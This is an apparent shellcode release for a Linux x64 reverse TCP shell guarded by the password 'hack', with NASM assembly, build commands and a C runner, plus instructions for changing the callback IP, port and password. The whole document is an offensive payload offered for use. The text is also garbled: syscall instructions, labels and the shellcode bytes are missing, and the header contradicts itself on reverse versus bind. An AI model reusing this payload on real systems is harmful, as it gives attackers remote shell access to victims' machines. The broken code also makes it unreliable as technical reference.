Linux/x64 - Reverse ( Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)









*Title:            tcp reverse shell with password prompt in 151 bytes 
*Author:           Sathish kumar
* Copyright:        (c) 2016 iQube. (
* Release Date:     January 6, 2016
*Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On:        Ubuntu 14.04 LTS
*Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444
* NOTE: This C code binds on port 4444 
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
*          				import socket
*		   				port = 4444
*          				hex(socket.htons(port))
*  					python 
*  					Result : 0x5c11 
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* 					nasm -felf64 filename.nasm -o filename.o
* 					ld filename.o -o filename
* To inspect for nulls
* 					objdump -M intel -D filename.o

global _start

    jmp sock
	prompt: db 'Passcode' ; initilization of prompt data
   	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; syscall number 41 

	xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
	xor rsi, rsi 
	mul rsi       
	push byte 0x2   ;pusing argument to the stack
	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
	push byte 0x29  ; pushing the syscall number into the rax by using stack
	pop rax
	; copying the socket descripter from rax to rdi register so that we can use it further 

	xchg rax, rdi
	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)
	; setting up the data sctructure
	xor rax, rax
	push rax                         ; bzero(&server.sin_zero, 8)
	mov ebx , 0xfeffff80             ; ip address "noted" to remove null
	not ebx
	mov dword [rsp-4], ebx
	sub rsp , 4                      ; adjust the stack
	push word 0x5c11                 ; port 4444 in network byte order
	push word 0x02                   ; AF_INET
	push rsp
	pop rsi

    ; connecting to the remote ip
    push 0x2a
    pop rax
    push 0x10
    pop rdx
	; initilization of dup2
	push 0x3                           
	pop rsi								; setting argument to 3 

    dec esi                            
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    jne duplicate
xor rax, rax                      
	inc al                             ; rax register to value 1 syscall for write
	push rax	
	pop rdi							   ; rdi register to value 1
	lea rsi, [rel prompt]
	xor rdx, rdx                       ; xor the rdx register to clear the previous values
	push 0xe
	pop rdx
									   ; checking the password using read
	push rsp
	pop rsi
	xor rax, rax   ; system read syscall value is 0 so rax is set to 0
	push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
	pop rax
	lea rdi, [rel rsi]
	scasd           ; comparing the user input and stored password in the stack
	jne Exit	  

execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register 
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order 
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax


	 ;Exit shellcode if password is wrong
	 push 0x3c
	 pop rax        ;syscall number for exit is 60
	 xor rdi, rdi 


unsigned char code[] = \
//ip address which can be obtained by
/*			example
 * 			hex value equivalent =
//replace this with the ip address of the system to which the shell should connect
//Port number this can be obtained from the above instrcutions
//Password this can be obtained by
 * python 
 * 			password = 'hack' 
 * 			(password[::-1]).encode('hex')
 * 			Reuslt : 6b636168 
 * 	This is stored in reverse beacuse of stack


	printf("Shellcode Length:  %d\n", (int)strlen(code));

	int (*ret)() = (int(*)())code;